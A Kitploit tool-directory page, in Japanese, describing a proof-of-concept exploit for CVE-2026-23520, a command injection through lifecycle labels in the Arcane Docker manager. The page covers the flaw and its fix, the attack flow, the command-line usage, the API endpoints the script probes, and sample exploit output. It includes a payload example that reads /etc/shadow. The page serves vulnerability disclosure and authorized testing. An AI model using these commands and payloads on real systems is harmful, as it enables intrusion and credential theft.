Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC-CVE-2026-23520 — CVE-2026-23520の概念実証エクスプロイト。Arcane Docker管理におけるライフサイクルラベルのOSコマンドインジェクションを介した認証済みRCEです。チェック、エクスプロイト、生成の各モードを含みます。 | Kitploit
ツール/GitHubGitHub/augmaster/poc-cve-2026-23520
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubaugmaster/poc-cve-2026-23520

POC-CVE-2026-23520

CVE-2026-23520の概念実証エクスプロイト。Arcane Docker管理におけるライフサイクルラベルのOSコマンドインジェクションを介した認証済みRCEです。チェック、エクスプロイト、生成の各モードを含みます。

リポジトリを見る
25ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23520 — Arcane Lifecycle Label RCE

Arcane Docker Management における OS コマンドインジェクション(< 1.13.0)

概要

Arcane は、モダンな Web ベースの Docker 管理プラットフォームです。1.13.0 より前のバージョンは、アップデーターサービスのライフサイクルラベルにおける OS コマンドインジェクションにより、認証済みユーザーによる リモートコード実行(RCE) に対して脆弱です。

アップデーターサービスは、以下の 2 つの Docker コンテナラベルをサポートしていました:

ラベルトリガー
com.getarcaneapp.arcane.lifecycle.pre-updateコンテナ更新前
com.getarcaneapp.arcane.lifecycle.post-updateコンテナ更新後

ラベルの値は、サニタイズなしで 直接 /bin/sh -c に渡されます。管理者だけでなく任意の認証済みユーザー が API を通じてプロジェクトを作成できるため、攻撃者は悪意のあるプロジェクトを仕掛けることができます。その後、管理者がコンテナ更新をトリガーすると、注入されたコマンドがコンテナ内で実行されます — ボリュームマウントが存在する場合はホスト上でも実行される可能性があります。

攻撃フロー

root@kitploit:~
 攻撃者(低権限ユーザー)                   Arcane サーバー
 ────────────────────────                   ──────────────
 1. 認証(任意のユーザー)  ──────────►  JWT 発行
 2. 悪意のあるライフサイクルラベルを         ラベル付きプロジェクトが
    含むプロジェクトを作成  ──────────►  保存される
                                             │
         ┌───────────────────────────────────┘
         │  3. 管理者がコンテナ更新をトリガー
         ▼
    Arcane アップデーターがラベル値を読み取る
    それを /bin/sh -c に渡す
         │
         ▼
    *** 任意のコマンド実行 ***
    (コンテナスコープ、またはボリュームがマウントされている場合はホスト)

影響を受けるバージョン

ステータスバージョン
脆弱Arcane < 1.13.0
修正済みArcane ≥ 1.13.0

修正(コミット 5a9c2f9)では、攻撃対象領域を排除するためにライフサイクルラベル機能が完全に削除されています。

特徴

  • 依存関係ゼロ — 標準ライブラリの urllib のみを使用し、Python 3.10+ であれば動作
  • 耐障害性のあるプロービング — 複数の API パス、レスポンスキー名、認証情報フィールド形式を静かに試行し、さまざまな Arcane バージョンや構成に適応
  • 3 つのモード — check(フィンガープリント)、exploit(展開)、generate(オフライン compose ファイル)
  • 詳細モード(-v)— どのエンドポイントをプロービングしているか、何が返ってくるかを正確に表示

使用方法

ターゲットが脆弱かどうかを確認

root@kitploit:~
python3 poc_cve_2026_23520.py check -t <TARGET_IP>

エクスプロイトを展開

root@kitploit:~
python3 poc_cve_2026_23520.py exploit \
    -t <TARGET_IP> \
    -u <USERNAME> \
    -p <PASSWORD> \
    --payload "id"

悪意のある compose ファイルを生成(オフライン)

root@kitploit:~
python3 poc_cve_2026_23520.py generate --payload "cat /etc/shadow"

エンドポイントプロービングのデバッグ

root@kitploit:~
python3 poc_cve_2026_23520.py -v check -t <TARGET_IP>

全オプション

root@kitploit:~
usage: poc_cve_2026_23520.py [-h] [-v] {exploit,check,generate} ...

positional arguments:
  {exploit,check,generate}
    exploit             Arcane API 経由で悪意のあるプロジェクトを展開
    check               Arcane をフィンガープリントし、脆弱かどうかを確認
    generate            悪意のある compose ファイルを生成(ネットワーク不要)

options:
  -h, --help            このヘルプメッセージを表示して終了
  -v, --verbose         プロービングのデバッグ出力を表示

エクスプロイトフラグ:

フラグ説明デフォルト
-t, --targetArcane ホスト(IP またはホスト名)必須
-P, --portArcane ポート3552
-u, --username任意の認証済み Arcane ユーザー必須
-p, --passwordユーザーパスワード必須
--payload注入するシェルコマンドid
--hookpre または post 更新フックpre
--project-name悪意のあるプロジェクトの名前poc-cve-2026-23520
--env-id環境 ID(省略時は自動検出)auto
--schemehttp または httpshttp
--no-verifyTLS 証明書の検証をスキップoff

エンドポイント耐障害性

このスクリプトは単一の API パスをハードコードしません。代わりに、各操作に対して複数の既知のパスを静かにプロービングし、最初にヒットしたパスで停止します:

操作試行するエンドポイント
バージョン/api/version, /api/system/version, /api/v1/version, /api/settings/version, /api/status, /api/health, /api/info
認証/api/auth/login, /api/login, /api/v1/auth/login, /api/auth/signin, /api/users/login
環境/api/environments, /api/v1/environments, /api/endpoints, /api/v1/endpoints
プロジェクト作成/api/environments/{id}/projects, /api/v1/environments/{id}/projects, /api/projects, /api/v1/projects など

レスポンスキーも柔軟に照合されます(例:currentVersion、version、Version、serverVersion — ネストされたオブジェクトや大文字小文字を区別しない検索を含む)。

出力例

root@kitploit:~
   ╔═══════════════════════════════════════════════════════╗
   ║          CVE-2026-23520  PoC Exploit                  ║
   ║    Arcane < 1.13.0 — Lifecycle Label RCE              ║
   ╚═══════════════════════════════════════════════════════╝

  ── Step 1 · ターゲットのフィンガープリント ──
  [*] Target: http://10.129.7.208:3552
  [*] バージョンエンドポイントをプロービング中 …
  [+] /api/version 経由でバージョンを検出
  [+] Arcane バージョン: v1.12.4
  [+] バージョン v1.12.4 は < 1.13.0 — 脆弱

  ── Step 2 · 認証 ──
  [*] 攻撃者として認証中 …
  [+] /api/auth/login 経由で JWT を取得

  ── Step 3 · 環境の検出 ──
  [*] 環境エンドポイントをプロービング中 …
  [+] /api/environments 経由で 1 つの環境を検出
  [*]   → 1  (local)
  [+] 環境を使用: 1

  ── Step 4 · 悪意のあるプロジェクトの仕込み ──
  [*] ライフサイクルラベルにペイロードを注入: pre-update
  [*] Label : com.getarcaneapp.arcane.lifecycle.pre-update
  [*] Value : id
  [+] /api/environments/1/projects 経由でプロジェクトを作成

  ── エクスプロイトの仕込みが完了 ──
  [+] 悪意のあるプロジェクトは更新トリガーを待機中です。

参考情報

  • アドバイザリ: GHSA-gjqq-6r35-w3r8
  • NVD: CVE-2026-23520
  • 修正コミット: 5a9c2f9
  • 修正済みリリース: v1.13.0

免責事項

このツールは 認可されたセキュリティテストおよび教育目的のみ で提供されます。コンピュータシステムへの不正アクセスは違法です。作者は誤用について一切の責任を負いません。所有しているシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用してください。

ライセンス

MIT

ツールをダウンロード